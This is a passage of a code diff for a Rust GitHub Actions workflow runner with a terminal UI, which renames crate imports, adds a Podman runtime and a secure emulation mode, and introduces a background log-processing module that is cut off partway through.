                    logging::warning("Switch to Workflows tab to trigger a workflow");
                    wrkflw_logging::warning(
                        "Switch to Workflows tab to trigger a workflow",
                    );
                    // For better UX, we could also automatically switch to the Workflows tab here
                    app.switch_tab(0);
                }

@@ -1,14 +1,15 @@
// App state for the UI
use crate::log_processor::{LogProcessingRequest, LogProcessor, ProcessedLogEntry};
use crate::models::{
    ExecutionResultMsg, JobExecution, LogFilterLevel, StepExecution, Workflow, WorkflowExecution,
    WorkflowStatus,
};
use chrono::Local;
use crossterm::event::KeyCode;
use executor::{JobStatus, RuntimeType, StepStatus};
use ratatui::widgets::{ListState, TableState};
use std::sync::mpsc;
use std::time::{Duration, Instant};
use wrkflw_executor::{JobStatus, RuntimeType, StepStatus};

/// Application state
pub struct App {
@@ -40,6 +41,15 @@ pub struct App {
    pub log_filter_level: Option<LogFilterLevel>, // Current log level filter
    pub log_search_matches: Vec<usize>, // Indices of logs that match the search
    pub log_search_match_idx: usize, // Current match index for navigation

    // Help tab scrolling
    pub help_scroll: usize, // Scrolling position for help content

    // Background log processing
    pub log_processor: LogProcessor,
    pub processed_logs: Vec<ProcessedLogEntry>,
    pub logs_need_update: bool, // Flag to trigger log processing
    pub last_system_logs_count: usize, // Track system log changes
}

impl App {
@@ -60,7 +70,7 @@ impl App {
        let mut step_table_state = TableState::default();
        step_table_state.select(Some(0));

        // Check Docker availability if Docker runtime is selected
        // Check container runtime availability if container runtime is selected
        let mut initial_logs = Vec::new();
        let runtime_type = match runtime_type {
            RuntimeType::Docker => {
@@ -69,8 +79,10 @@ impl App {
                // Use a very short timeout to prevent blocking the UI
                let result = std::thread::scope(|s| {
                    let handle = s.spawn(|| {
                        utils::fd::with_stderr_to_null(executor::docker::is_available)
                            .unwrap_or(false)
                        wrkflw_utils::fd::with_stderr_to_null(
                            wrkflw_executor::docker::is_available,
                        )
                        .unwrap_or(false)
                    });

                    // Set a short timeout for the thread
@@ -85,7 +97,7 @@ impl App {
                    }

                    // If we reach here, the check took too long
                    logging::warning(
                    wrkflw_logging::warning(
                        "Docker availability check timed out, falling back to emulation mode",
                    );
                    false
@@ -94,7 +106,7 @@ impl App {
                }) {
                    Ok(result) => result,
                    Err(_) => {
                        logging::warning("Docker availability check failed with panic, falling back to emulation mode");
                        wrkflw_logging::warning("Docker availability check failed with panic, falling back to emulation mode");
                        false
                    }
                };
@@ -104,16 +116,69 @@ impl App {
                        "Docker is not available or unresponsive. Using emulation mode instead."
                            .to_string(),
                    );
                    logging::warning(
                    wrkflw_logging::warning(
                        "Docker is not available or unresponsive. Using emulation mode instead.",
                    );
                    RuntimeType::Emulation
                } else {
                    logging::info("Docker is available, using Docker runtime");
                    wrkflw_logging::info("Docker is available, using Docker runtime");
                    RuntimeType::Docker
                }
            }
            RuntimeType::Podman => {
                // Use a timeout for the Podman availability check to prevent hanging
                let is_podman_available = match std::panic::catch_unwind(|| {
                    // Use a very short timeout to prevent blocking the UI
                    let result = std::thread::scope(|s| {
                        let handle = s.spawn(|| {
                            wrkflw_utils::fd::with_stderr_to_null(
                                wrkflw_executor::podman::is_available,
                            )
                            .unwrap_or(false)
                        });

                        // Set a short timeout for the thread
                        let start = std::time::Instant::now();
                        let timeout = std::time::Duration::from_secs(1);

                        while start.elapsed() < timeout {
                            if handle.is_finished() {
                                return handle.join().unwrap_or(false);
                            }
                            std::thread::sleep(std::time::Duration::from_millis(10));
                        }

                        // If we reach here, the check took too long
                        wrkflw_logging::warning(
                            "Podman availability check timed out, falling back to emulation mode",
                        );
                        false
                    });
                    result
                }) {
                    Ok(result) => result,
                    Err(_) => {
                        wrkflw_logging::warning("Podman availability check failed with panic, falling back to emulation mode");
                        false
                    }
                };

                if !is_podman_available {
                    initial_logs.push(
                        "Podman is not available or unresponsive. Using emulation mode instead."
                            .to_string(),
                    );
                    wrkflw_logging::warning(
                        "Podman is not available or unresponsive. Using emulation mode instead.",
                    );
                    RuntimeType::Emulation
                } else {
                    wrkflw_logging::info("Podman is available, using Podman runtime");
                    RuntimeType::Podman
                }
            }
            RuntimeType::Emulation => RuntimeType::Emulation,
            RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
        };

        App {
@@ -145,6 +210,13 @@ impl App {
            log_filter_level: Some(LogFilterLevel::All),
            log_search_matches: Vec::new(),
            log_search_match_idx: 0,
            help_scroll: 0,

            // Background log processing
            log_processor: LogProcessor::new(),
            processed_logs: Vec::new(),
            logs_need_update: true,
            last_system_logs_count: 0,
        }
    }

@@ -159,7 +231,9 @@ impl App {

    pub fn toggle_emulation_mode(&mut self) {
        self.runtime_type = match self.runtime_type {
            RuntimeType::Docker => RuntimeType::Emulation,
            RuntimeType::Docker => RuntimeType::Podman,
            RuntimeType::Podman => RuntimeType::SecureEmulation,
            RuntimeType::SecureEmulation => RuntimeType::Emulation,
            RuntimeType::Emulation => RuntimeType::Docker,
        };
        self.logs
@@ -176,13 +250,15 @@ impl App {
        let timestamp = Local::now().format("%H:%M:%S").to_string();
        self.logs
            .push(format!("[{}] Switched to {} mode", timestamp, mode));
        logging::info(&format!("Switched to {} mode", mode));
        wrkflw_logging::info(&format!("Switched to {} mode", mode));
    }

    pub fn runtime_type_name(&self) -> &str {
        match self.runtime_type {
            RuntimeType::Docker => "Docker",
            RuntimeType::Emulation => "Emulation",
            RuntimeType::Podman => "Podman",
            RuntimeType::SecureEmulation => "Secure Emulation",
            RuntimeType::Emulation => "Emulation (Unsafe)",
        }
    }

@@ -373,10 +449,9 @@ impl App {
        if let Some(idx) = self.workflow_list_state.selected() {
            if idx < self.workflows.len() && !self.execution_queue.contains(&idx) {
                self.execution_queue.push(idx);
                let timestamp = Local::now().format("%H:%M:%S").to_string();
                self.logs.push(format!(
                    "[{}] Added '{}' to execution queue. Press 'Enter' to start.",
                    timestamp, self.workflows[idx].name
                self.add_timestamped_log(&format!(
                    "Added '{}' to execution queue. Press 'Enter' to start.",
                    self.workflows[idx].name
                ));
            }
        }
@@ -393,7 +468,7 @@ impl App {
            let timestamp = Local::now().format("%H:%M:%S").to_string();
            self.logs
                .push(format!("[{}] Starting workflow execution...", timestamp));
            logging::info("Starting workflow execution...");
            wrkflw_logging::info("Starting workflow execution...");
        }
    }

@@ -401,7 +476,7 @@ impl App {
    pub fn process_execution_result(
        &mut self,
        workflow_idx: usize,
        result: Result<(Vec<executor::JobResult>, ()), String>,
        result: Result<(Vec<wrkflw_executor::JobResult>, ()), String>,
    ) {
        if workflow_idx >= self.workflows.len() {
            let timestamp = Local::now().format("%H:%M:%S").to_string();
@@ -409,7 +484,7 @@ impl App {
                "[{}] Error: Invalid workflow index received",
                timestamp
            ));
            logging::error("Invalid workflow index received in process_execution_result");
            wrkflw_logging::error("Invalid workflow index received in process_execution_result");
            return;
        }

@@ -438,15 +513,15 @@ impl App {
                    .push(format!("[{}] Operation completed successfully.", timestamp));
                execution_details.progress = 1.0;

                // Convert executor::JobResult to our JobExecution struct
                // Convert wrkflw_executor::JobResult to our JobExecution struct
                execution_details.jobs = jobs
                    .iter()
                    .map(|job_result| JobExecution {
                        name: job_result.name.clone(),
                        status: match job_result.status {
                            executor::JobStatus::Success => JobStatus::Success,
                            executor::JobStatus::Failure => JobStatus::Failure,
                            executor::JobStatus::Skipped => JobStatus::Skipped,
                            wrkflw_executor::JobStatus::Success => JobStatus::Success,
                            wrkflw_executor::JobStatus::Failure => JobStatus::Failure,
                            wrkflw_executor::JobStatus::Skipped => JobStatus::Skipped,
                        },
                        steps: job_result
                            .steps
@@ -454,9 +529,9 @@ impl App {
                            .map(|step_result| StepExecution {
                                name: step_result.name.clone(),
                                status: match step_result.status {
                                    executor::StepStatus::Success => StepStatus::Success,
                                    executor::StepStatus::Failure => StepStatus::Failure,
                                    executor::StepStatus::Skipped => StepStatus::Skipped,
                                    wrkflw_executor::StepStatus::Success => StepStatus::Success,
                                    wrkflw_executor::StepStatus::Failure => StepStatus::Failure,
                                    wrkflw_executor::StepStatus::Skipped => StepStatus::Skipped,
                                },
                                output: step_result.output.clone(),
                            })
@@ -495,7 +570,7 @@ impl App {
                    "[{}] Workflow '{}' completed successfully!",
                    timestamp, workflow.name
                ));
                logging::info(&format!(
                wrkflw_logging::info(&format!(
                    "[{}] Workflow '{}' completed successfully!",
                    timestamp, workflow.name
                ));
@@ -507,7 +582,7 @@ impl App {
                    "[{}] Workflow '{}' failed: {}",
                    timestamp, workflow.name, e
                ));
                logging::error(&format!(
                wrkflw_logging::error(&format!(
                    "[{}] Workflow '{}' failed: {}",
                    timestamp, workflow.name, e
                ));
@@ -533,7 +608,7 @@ impl App {
            self.current_execution = Some(next);
            self.logs
                .push(format!("Executing workflow: {}", self.workflows[next].name));
            logging::info(&format!(
            wrkflw_logging::info(&format!(
                "Executing workflow: {}",
                self.workflows[next].name
            ));
@@ -579,10 +654,11 @@ impl App {
                self.log_search_active = false;
                self.log_search_query.clear();
                self.log_search_matches.clear();
                self.mark_logs_for_update();
            }
            KeyCode::Backspace => {
                self.log_search_query.pop();
                self.update_log_search_matches();
                self.mark_logs_for_update();
            }
            KeyCode::Enter => {
                self.log_search_active = false;
@@ -590,7 +666,7 @@ impl App {
            }
            KeyCode::Char(c) => {
                self.log_search_query.push(c);
                self.update_log_search_matches();
                self.mark_logs_for_update();
            }
            _ => {}
        }
@@ -602,8 +678,8 @@ impl App {
        if !self.log_search_active {
            // Don't clear the query, this allows toggling the search UI while keeping the filter
        } else {
            // When activating search, update matches
            self.update_log_search_matches();
            // When activating search, trigger update
            self.mark_logs_for_update();
        }
    }

@@ -614,8 +690,8 @@ impl App {
            Some(level) => Some(level.next()),
        };

        // Update search matches when filter changes
        self.update_log_search_matches();
        // Trigger log processing update when filter changes
        self.mark_logs_for_update();
    }

    // Clear log search and filter
@@ -624,6 +700,7 @@ impl App {
        self.log_filter_level = None;
        self.log_search_matches.clear();
        self.log_search_match_idx = 0;
        self.mark_logs_for_update();
    }

    // Update matches based on current search and filter
@@ -636,7 +713,7 @@ impl App {
        for log in &self.logs {
            all_logs.push(log.clone());
        }
        for log in logging::get_logs() {
        for log in wrkflw_logging::get_logs() {
            all_logs.push(log.clone());
        }

@@ -728,12 +805,24 @@ impl App {
    // Scroll logs down
    pub fn scroll_logs_down(&mut self) {
        // Get total log count including system logs
        let total_logs = self.logs.len() + logging::get_logs().len();
        let total_logs = self.logs.len() + wrkflw_logging::get_logs().len();
        if total_logs > 0 {
            self.log_scroll = (self.log_scroll + 1).min(total_logs - 1);
        }
    }

    // Scroll help content up
    pub fn scroll_help_up(&mut self) {
        self.help_scroll = self.help_scroll.saturating_sub(1);
    }

    // Scroll help content down
    pub fn scroll_help_down(&mut self) {
        // The help content has a fixed number of lines, so we set a reasonable max
        const MAX_HELP_SCROLL: usize = 30; // Adjust based on help content length
        self.help_scroll = (self.help_scroll + 1).min(MAX_HELP_SCROLL);
    }

    // Update progress for running workflows
    pub fn update_running_workflow_progress(&mut self) {
        if let Some(idx) = self.current_execution {
@@ -782,7 +871,9 @@ impl App {
            let timestamp = Local::now().format("%H:%M:%S").to_string();
            self.logs
                .push(format!("[{}] Error: Invalid workflow selection", timestamp));
            logging::error("Invalid workflow selection in trigger_selected_workflow");
            wrkflw_logging::error(
                "Invalid workflow selection in trigger_selected_workflow",
            );
            return;
        }

@@ -792,7 +883,7 @@ impl App {
            "[{}] Triggering workflow: {}",
            timestamp, workflow.name
        ));
        logging::info(&format!("Triggering workflow: {}", workflow.name));
        wrkflw_logging::info(&format!("Triggering workflow: {}", workflow.name));

        // Clone necessary values for the async task
        let workflow_name = workflow.name.clone();
@@ -825,19 +916,19 @@ impl App {

                // Send the result back to the main thread
                if let Err(e) = tx_clone.send((selected_idx, result)) {
                    logging::error(&format!("Error sending trigger result: {}", e));
                    wrkflw_logging::error(&format!("Error sending trigger result: {}", e));
                }
            });
        } else {
            let timestamp = Local::now().format("%H:%M:%S").to_string();
            self.logs
                .push(format!("[{}] No workflow selected to trigger", timestamp));
            logging::warning("No workflow selected to trigger");
            wrkflw_logging::warning("No workflow selected to trigger");
        }
        } else {
            self.logs
                .push("No workflow selected to trigger".to_string());
            logging::warning("No workflow selected to trigger");
            wrkflw_logging::warning("No workflow selected to trigger");
        }
    }

@@ -850,7 +941,7 @@ impl App {
                "[{}] Debug: No workflow selected for reset",
                timestamp
            ));
            logging::warning("No workflow selected for reset");
            wrkflw_logging::warning("No workflow selected for reset");
            return;
        }

@@ -887,7 +978,7 @@ impl App {
                "[{}] Reset workflow '{}' from {} state to NotStarted - status is now {:?}",
                timestamp, workflow.name, old_status, workflow.status
            ));
            logging::info(&format!(
            wrkflw_logging::info(&format!(
                "Reset workflow '{}' from {} state to NotStarted - status is now {:?}",
                workflow.name, old_status, workflow.status
            ));
@@ -897,4 +988,82 @@ impl App {
            }
        }
    }
}

    /// Request log processing update from background thread
    pub fn request_log_processing_update(&mut self) {
        let request = LogProcessingRequest {
            search_query: self.log_search_query.clone(),
            filter_level: self.log_filter_level.clone(),
            app_logs: self.logs.clone(),
            app_logs_count: self.logs.len(),
            system_logs_count: wrkflw_logging::get_logs().len(),
        };

        if self.log_processor.request_update(request).is_err() {
            // Log processor channel disconnected, recreate it
            self.log_processor = LogProcessor::new();
            self.logs_need_update = true;
        }
    }

    /// Check for and apply log processing updates
    pub fn check_log_processing_updates(&mut self) {
        // Check if system logs have changed
        let current_system_logs_count = wrkflw_logging::get_logs().len();
        if current_system_logs_count != self.last_system_logs_count {
            self.last_system_logs_count = current_system_logs_count;
            self.mark_logs_for_update();
        }

        if let Some(response) = self.log_processor.try_get_update() {
            self.processed_logs = response.processed_logs;
            self.log_search_matches = response.search_matches;

            // Update scroll position to first match if we have search results
            if !self.log_search_matches.is_empty() && !self.log_search_query.is_empty() {
                self.log_search_match_idx = 0;
                if let Some(&idx) = self.log_search_matches.first() {
                    self.log_scroll = idx;
                }
            }

            self.logs_need_update = false;
        }
    }

    /// Trigger log processing when search/filter changes
    pub fn mark_logs_for_update(&mut self) {
        self.logs_need_update = true;
        self.request_log_processing_update();
    }

    /// Get combined app and system logs for background processing
    pub fn get_combined_logs(&self) -> Vec<String> {
        let mut all_logs = Vec::new();

        // Add app logs
        for log in &self.logs {
            all_logs.push(log.clone());
        }

        // Add system logs
        for log in wrkflw_logging::get_logs() {
            all_logs.push(log.clone());
        }

        all_logs
    }

    /// Add a log entry and trigger log processing update
    pub fn add_log(&mut self, message: String) {
        self.logs.push(message);
        self.mark_logs_for_update();
    }

    /// Add a formatted log entry with timestamp and trigger log processing update
    pub fn add_timestamped_log(&mut self, message: &str) {
        let timestamp = Local::now().format("%H:%M:%S").to_string();
        let formatted_message = format!("[{}] {}", timestamp, message);
        self.add_log(formatted_message);
    }
}

@@ -2,12 +2,12 @@
use crate::app::App;
use crate::models::{ExecutionResultMsg, WorkflowExecution, WorkflowStatus};
use chrono::Local;
use evaluator::evaluate_workflow_file;
use executor::{self, JobStatus, RuntimeType, StepStatus};
use std::io;
use std::path::{Path, PathBuf};
use std::sync::mpsc;
use std::thread;
use wrkflw_evaluator::evaluate_workflow_file;
use wrkflw_executor::{self, JobStatus, RuntimeType, StepStatus};

// Validate a workflow or directory containing workflows
pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
@@ -20,7 +20,7 @@ pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
        let entry = entry?;
        let entry_path = entry.path();

        if entry_path.is_file() && utils::is_workflow_file(&entry_path) {
        if entry_path.is_file() && wrkflw_utils::is_workflow_file(&entry_path) {
            workflows.push(entry_path);
        }
    }
@@ -102,17 +102,27 @@ pub async fn execute_workflow_cli(
        }
    }

    // Check Docker availability if Docker runtime is selected
    // Check container runtime availability if container runtime is selected
    let runtime_type = match runtime_type {
        RuntimeType::Docker => {
            if !executor::docker::is_available() {
            if !wrkflw_executor::docker::is_available() {
                println!("⚠️ Docker is not available. Using emulation mode instead.");
                logging::warning("Docker is not available. Using emulation mode instead.");
                wrkflw_logging::warning("Docker is not available. Using emulation mode instead.");
                RuntimeType::Emulation
            } else {
                RuntimeType::Docker
            }
        }
        RuntimeType::Podman => {
            if !wrkflw_executor::podman::is_available() {
                println!("⚠️ Podman is not available. Using emulation mode instead.");
                wrkflw_logging::warning("Podman is not available. Using emulation mode instead.");
                RuntimeType::Emulation
            } else {
                RuntimeType::Podman
            }
        }
        RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
        RuntimeType::Emulation => RuntimeType::Emulation,
    };

@@ -120,20 +130,21 @@ pub async fn execute_workflow_cli(
    println!("Runtime mode: {:?}", runtime_type);

    // Log the start of the execution in debug mode with more details
    logging::debug(&format!(
    wrkflw_logging::debug(&format!(
        "Starting workflow execution: path={}, runtime={:?}, verbose={}",
        path.display(),
        runtime_type,
        verbose
    ));

    let config = executor::ExecutionConfig {
    let config = wrkflw_executor::ExecutionConfig {
        runtime_type,
        verbose,
        preserve_containers_on_failure: false, // Default for this path
        secrets_config: None, // Use default secrets configuration
    };

    match executor::execute_workflow(path, config).await {
    match wrkflw_executor::execute_workflow(path, config).await {
        Ok(result) => {
            println!("\nWorkflow execution results:");

@@ -157,7 +168,7 @@ pub async fn execute_workflow_cli(
            println!("-------------------------");

            // Log the job details for debug purposes
            logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
            wrkflw_logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));

            for step in job.steps.iter() {
                match step.status {
@@ -193,7 +204,7 @@ pub async fn execute_workflow_cli(
                }

                // Show command/run details in debug mode
                if logging::get_log_level() <= logging::LogLevel::Debug {
                if wrkflw_logging::get_log_level() <= wrkflw_logging::LogLevel::Debug {
                    if let Some(cmd_output) = step
                        .output
                        .lines()
@@ -233,7 +244,7 @@ pub async fn execute_workflow_cli(
                }

                // Always log the step details for debug purposes
                logging::debug(&format!(
                wrkflw_logging::debug(&format!(
                    "Step: {}, Status: {:?}, Output length: {} lines",
                    step.name,
                    step.status,
@@ -241,10 +252,10 @@ pub async fn execute_workflow_cli(
                ));

                // In debug mode, log all step output
                if logging::get_log_level() == logging::LogLevel::Debug
                if wrkflw_logging::get_log_level() == wrkflw_logging::LogLevel::Debug
                    && !step.output.trim().is_empty()
                {
                    logging::debug(&format!(
                    wrkflw_logging::debug(&format!(
                        "Step output for '{}': \n{}",
                        step.name, step.output
                    ));
@@ -256,7 +267,7 @@ pub async fn execute_workflow_cli(
            println!("\n❌ Workflow completed with failures");
            // In the case of failure, we'll also inform the user about the debug option
            // if they're not already using it
            if logging::get_log_level() > logging::LogLevel::Debug {
            if wrkflw_logging::get_log_level() > wrkflw_logging::LogLevel::Debug {
                println!(" Run with --debug for more detailed output");
            }
        } else {
@@ -267,7 +278,7 @@ pub async fn execute_workflow_cli(
        }
        Err(e) => {
            println!("❌ Failed to execute workflow: {}", e);
            logging::error(&format!("Failed to execute workflow: {}", e));
            wrkflw_logging::error(&format!("Failed to execute workflow: {}", e));
            Err(io::Error::other(e))
        }
    }
@@ -277,7 +288,7 @@ pub async fn execute_workflow_cli(
pub async fn execute_curl_trigger(
    workflow_name: &str,
    branch: Option<&str>,
) -> Result<(Vec<executor::JobResult>, ()), String> {
) -> Result<(Vec<wrkflw_executor::JobResult>, ()), String> {
    // Get GitHub token
    let token = std::env::var("GITHUB_TOKEN").map_err(|_| {
        "GitHub token not found. Please set GITHUB_TOKEN environment variable".to_string()
@@ -285,13 +296,13 @@ pub async fn execute_curl_trigger(

    // Debug log to check if GITHUB_TOKEN is set
    match std::env::var("GITHUB_TOKEN") {
        Ok(token) => logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
        Err(_) => logging::error("GITHUB_TOKEN is not set"),
        Ok(token) => wrkflw_logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
        Err(_) => wrkflw_logging::error("GITHUB_TOKEN is not set"),
    }

    // Get repository information
    let repo_info =
        github::get_repo_info().map_err(|e| format!("Failed to get repository info: {}", e))?;
    let repo_info = wrkflw_github::get_repo_info()
        .map_err(|e| format!("Failed to get repository info: {}", e))?;

    // Determine branch to use
    let branch_ref = branch.unwrap_or(&repo_info.default_branch);
@@ -306,7 +317,7 @@ pub async fn execute_curl_trigger(
        workflow_name
    };

    logging::info(&format!("Using workflow name: {}", workflow_name));
    wrkflw_logging::info(&format!("Using workflow name: {}", workflow_name));

    // Construct JSON payload
    let payload = serde_json::json!({
@@ -319,7 +330,7 @@ pub async fn execute_curl_trigger(
        repo_info.owner, repo_info.repo, workflow_name
    );

    logging::info(&format!("Triggering workflow at URL: {}", url));
    wrkflw_logging::info(&format!("Triggering workflow at URL: {}", url));

    // Create a reqwest client
    let client = reqwest::Client::new();
@@ -353,12 +364,12 @@ pub async fn execute_curl_trigger(
    );

    // Create a job result structure
    let job_result = executor::JobResult {
    let job_result = wrkflw_executor::JobResult {
        name: "GitHub Trigger".to_string(),
        status: executor::JobStatus::Success,
        steps: vec![executor::StepResult {
        status: wrkflw_executor::JobStatus::Success,
        steps: vec![wrkflw_executor::StepResult {
            name: "Remote Trigger".to_string(),
            status: executor::StepStatus::Success,
            status: wrkflw_executor::StepStatus::Success,
            output: success_msg,
        }],
        logs: "Workflow triggered remotely on GitHub".to_string(),
@@ -382,41 +393,70 @@ pub fn start_next_workflow_execution(
    if verbose {
        app.logs
            .push("Verbose mode: Step outputs will be displayed in full".to_string());
        logging::info("Verbose mode: Step outputs will be displayed in full");
        wrkflw_logging::info("Verbose mode: Step outputs will be displayed in full");
    } else {
        app.logs.push(
            "Standard mode: Only step status will be shown (use --verbose for full output)"
                .to_string(),
        );
        logging::info(
        wrkflw_logging::info(
            "Standard mode: Only step status will be shown (use --verbose for full output)",
        );
    }

    // Check Docker availability again if Docker runtime is selected
    // Check container runtime availability again if container runtime is selected
    let runtime_type = match app.runtime_type {
        RuntimeType::Docker => {
            // Use safe FD redirection to check Docker availability
            let is_docker_available =
                match utils::fd::with_stderr_to_null(executor::docker::is_available) {
                    Ok(result) => result,
                    Err(_) => {
                        logging::debug(
                            "Failed to redirect stderr when checking Docker availability.",
                        );
                        false
                    }
                };
            let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
                wrkflw_executor::docker::is_available,
            ) {
                Ok(result) => result,
                Err(_) => {
                    wrkflw_logging::debug(
                        "Failed to redirect stderr when checking Docker availability.",
                    );
                    false
                }
            };

            if !is_docker_available {
                app.logs
                    .push("Docker is not available. Using emulation mode instead.".to_string());
                logging::warning("Docker is not available. Using emulation mode instead.");
                wrkflw_logging::warning(
                    "Docker is not available. Using emulation mode instead.",
                );
                RuntimeType::Emulation
            } else {
                RuntimeType::Docker
            }
        }
        RuntimeType::Podman => {
            // Use safe FD redirection to check Podman availability
            let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
                wrkflw_executor::podman::is_available,
            ) {
                Ok(result) => result,
                Err(_) => {
                    wrkflw_logging::debug(
                        "Failed to redirect stderr when checking Podman availability.",
                    );
                    false
                }
            };

            if !is_podman_available {
                app.logs
                    .push("Podman is not available. Using emulation mode instead.".to_string());
                wrkflw_logging::warning(
                    "Podman is not available. Using emulation mode instead.",
                );
                RuntimeType::Emulation
            } else {
                RuntimeType::Podman
            }
        }
        RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
        RuntimeType::Emulation => RuntimeType::Emulation,
    };

@@ -456,21 +496,21 @@ pub fn start_next_workflow_execution(
            Ok(validation_result) => {
                // Create execution result based on validation
                let status = if validation_result.is_valid {
                    executor::JobStatus::Success
                    wrkflw_executor::JobStatus::Success
                } else {
                    executor::JobStatus::Failure
                    wrkflw_executor::JobStatus::Failure
                };

                // Create a synthetic job result for validation
                let jobs = vec![executor::JobResult {
                let jobs = vec![wrkflw_executor::JobResult {
                    name: "Validation".to_string(),
                    status,
                    steps: vec![executor::StepResult {
                    steps: vec![wrkflw_executor::StepResult {
                        name: "Validator".to_string(),
                        status: if validation_result.is_valid {
                            executor::StepStatus::Success
                            wrkflw_executor::StepStatus::Success
                        } else {
                            executor::StepStatus::Failure
                            wrkflw_executor::StepStatus::Failure
                        },
                        output: validation_result.issues.join("\n"),
                    }],
@@ -490,15 +530,16 @@ pub fn start_next_workflow_execution(
            }
        } else {
            // Use safe FD redirection for execution
            let config = executor::ExecutionConfig {
            let config = wrkflw_executor::ExecutionConfig {
                runtime_type,
                verbose,
                preserve_containers_on_failure,
                secrets_config: None, // Use default secrets configuration
            };

            let execution_result = utils::fd::with_stderr_to_null(|| {
            let execution_result = wrkflw_utils::fd::with_stderr_to_null(|| {
                futures::executor::block_on(async {
                    executor::execute_workflow(&workflow_path, config).await
                    wrkflw_executor::execute_workflow(&workflow_path, config).await
                })
            })
            .map_err(|e| format!("Failed to redirect stderr during execution: {}", e))?;
@@ -515,7 +556,7 @@ pub fn start_next_workflow_execution(

            // Only send if we get a valid result
            if let Err(e) = tx_clone_inner.send((next_idx, result)) {
                logging::error(&format!("Error sending execution result: {}", e));
                wrkflw_logging::error(&format!("Error sending execution result: {}", e));
            }
        });
    } else {
@@ -523,6 +564,6 @@ pub fn start_next_workflow_execution(
        let timestamp = Local::now().format("%H:%M:%S").to_string();
        app.logs
            .push(format!("[{}] All workflows completed execution", timestamp));
        logging::info("All workflows completed execution");
        wrkflw_logging::info("All workflows completed execution");
    }
}

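Both the TUI and CLI paths above repeat the same probe-and-fall-back dance for Docker and Podman. A condensed sketch of that pattern, assuming the `wrkflw_utils::fd::with_stderr_to_null` and `wrkflw_executor::{docker,podman}::is_available` signatures used in this diff (the `resolve_runtime` helper itself is hypothetical, not part of the changeset):

```rust
use wrkflw_executor::RuntimeType;

/// Sketch of the fallback used above: probe the requested container runtime
/// with stderr silenced, and drop to emulation when the probe fails or errors.
fn resolve_runtime(requested: RuntimeType) -> RuntimeType {
    let probe = |is_available: fn() -> bool| {
        wrkflw_utils::fd::with_stderr_to_null(is_available).unwrap_or(false)
    };
    match requested {
        RuntimeType::Docker if !probe(wrkflw_executor::docker::is_available) => {
            wrkflw_logging::warning("Docker is not available. Using emulation mode instead.");
            RuntimeType::Emulation
        }
        RuntimeType::Podman if !probe(wrkflw_executor::podman::is_available) => {
            wrkflw_logging::warning("Podman is not available. Using emulation mode instead.");
            RuntimeType::Emulation
        }
        other => other,
    }
}
```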
@@ -12,6 +12,7 @@
pub mod app;
pub mod components;
pub mod handlers;
pub mod log_processor;
pub mod models;
pub mod utils;
pub mod views;

305 crates/ui/src/log_processor.rs (new file)
@@ -0,0 +1,305 @@
// Background log processor for asynchronous log filtering and formatting
use crate::models::LogFilterLevel;
use ratatui::{
    style::{Color, Style},
    text::{Line, Span},
    widgets::{Cell, Row},
};
use std::sync::mpsc;
use std::thread;
use std::time::{Duration, Instant};

/// Processed log entry ready for rendering
#[derive(Debug, Clone)]
pub struct ProcessedLogEntry {
    pub timestamp: String,
    pub log_type: String,
    pub log_style: Style,
    pub content_spans: Vec<Span<'static>>,
}

impl ProcessedLogEntry {
    /// Convert to a table row for rendering
    pub fn to_row(&self) -> Row<'static> {
        Row::new(vec![
            Cell::from(self.timestamp.clone()),
            Cell::from(self.log_type.clone()).style(self.log_style),
            Cell::from(Line::from(self.content_spans.clone())),
        ])
    }
}

/// Request to update log processing parameters
#[derive(Debug, Clone)]
pub struct LogProcessingRequest {
    pub search_query: String,
    pub filter_level: Option<LogFilterLevel>,
    pub app_logs: Vec<String>, // Complete app logs
    pub app_logs_count: usize, // To detect changes in app logs
    pub system_logs_count: usize, // To detect changes in system logs
}

/// Response with processed logs
#[derive(Debug, Clone)]
pub struct LogProcessingResponse {
    pub processed_logs: Vec<ProcessedLogEntry>,
    pub total_log_count: usize,
    pub filtered_count: usize,
    pub search_matches: Vec<usize>, // Indices of logs that match search
}

/// Background log processor
pub struct LogProcessor {
    request_tx: mpsc::Sender<LogProcessingRequest>,
    response_rx: mpsc::Receiver<LogProcessingResponse>,
    _worker_handle: thread::JoinHandle<()>,
}

impl LogProcessor {
    /// Create a new log processor with a background worker thread
    pub fn new() -> Self {
        let (request_tx, request_rx) = mpsc::channel::<LogProcessingRequest>();
        let (response_tx, response_rx) = mpsc::channel::<LogProcessingResponse>();

        let worker_handle = thread::spawn(move || {
            Self::worker_loop(request_rx, response_tx);
        });

        Self {
            request_tx,
            response_rx,
            _worker_handle: worker_handle,
        }
    }

    /// Send a processing request (non-blocking)
    pub fn request_update(
        &self,
        request: LogProcessingRequest,
    ) -> Result<(), mpsc::SendError<LogProcessingRequest>> {
        self.request_tx.send(request)
    }

    /// Try to get the latest processed logs (non-blocking)
    pub fn try_get_update(&self) -> Option<LogProcessingResponse> {
        self.response_rx.try_recv().ok()
    }

    /// Background worker loop
    fn worker_loop(
        request_rx: mpsc::Receiver<LogProcessingRequest>,
        response_tx: mpsc::Sender<LogProcessingResponse>,
    ) {
        let mut last_request: Option<LogProcessingRequest> = None;
        let mut last_processed_time = Instant::now();
        let mut cached_logs: Vec<String> = Vec::new();
        let mut cached_app_logs_count = 0;
        let mut cached_system_logs_count = 0;

        loop {
            // Check for new requests with a timeout to allow periodic processing
            let request = match request_rx.recv_timeout(Duration::from_millis(100)) {
                Ok(req) => Some(req),
                Err(mpsc::RecvTimeoutError::Timeout) => None,
                Err(mpsc::RecvTimeoutError::Disconnected) => break,
            };

            // Update request if we received one
            if let Some(req) = request {
                last_request = Some(req);
            }

            // Process if we have a request and enough time has passed since last processing
            if let Some(ref req) = last_request {
                let should_process = last_processed_time.elapsed() > Duration::from_millis(50)
                    && (cached_app_logs_count != req.app_logs_count
                        || cached_system_logs_count != req.system_logs_count
                        || cached_logs.is_empty());

                if should_process {
                    // Refresh log cache if log counts changed
                    if cached_app_logs_count != req.app_logs_count
                        || cached_system_logs_count != req.system_logs_count
